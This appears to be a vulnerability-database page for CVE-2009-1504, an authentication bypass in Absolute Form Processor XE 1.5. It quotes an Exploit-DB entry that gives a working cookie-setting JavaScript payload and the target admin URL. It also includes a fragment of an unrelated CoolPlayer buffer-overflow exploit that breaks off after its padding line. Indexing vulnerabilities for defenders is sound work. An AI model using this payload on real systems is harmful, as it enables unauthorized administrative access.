CVE-2009-1504
published 2009-05-01CVE-2009-1504: Absolute Form Processor XE 1.5 allows remote attackers to bypass authentication and gain administrative access by setting the xlaAFPadmin cookie to…
PriorityP354high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.43%
82.2th percentile
Absolute Form Processor XE 1.5 allows remote attackers to bypass authentication and gain administrative access by setting the xlaAFPadmin cookie to "lvl=1&userid=1."
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xigla | absolute_control_panel_xe | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling
exploitdb·2009-04-24
CVE-2009-1504 Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling
Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling
---
[~] Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 11.04.2009
[~]
[~] Home: yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com
[~]
[~] msn: [email protected]
[~]
[~] N0T: Herkes Hecker Olmus :S
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------
exploit:
javascript:document.cookie = "xlaAFPadmin=lvl=1&userid=1; path=/";
after you go here:
http://www.xigla.com/absolutefp/demo/menu.asp
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N &
Exploit-DB
CoolPlayer Portable 2.19.1 - 'Skin' Local Buffer Overflow
exploitdb·2009-04-23
CVE-2009-1449 CoolPlayer Portable 2.19.1 - 'Skin' Local Buffer Overflow
CoolPlayer Portable 2.19.1 - 'Skin' Local Buffer Overflow
---
# CoolPlayer Portable 2.19.1 (Skin) Buffer Overflow exploit
# Credit To Gold_m http://www.milw0rm.com/exploits/8489
# By Stack Sysworm.com
# Note abouts this Exploit : right click >> Option >> Open >> select our target file and boooooom calc executed :d
# Note abouts the last exploit (m3u): my first Exploit Have just 212 + 4 - Junk + eip i dont know why didin't be the same for my sweety freind His0ka
# When i test He's exploit it didin't work and the ret adress be far from eip register and it overwrited by A's junk i dont know why but i think the junk change from box to box
# Thnx for all freind ( Jadi - Mr.Safa7 - Hod - His0ka - Djekmani etc ......
# Thnx for the great str0ke thnx for your support :d
chars = "\x41" * 1504
eip
No writeups or analysis indexed.
2009-05-01
Published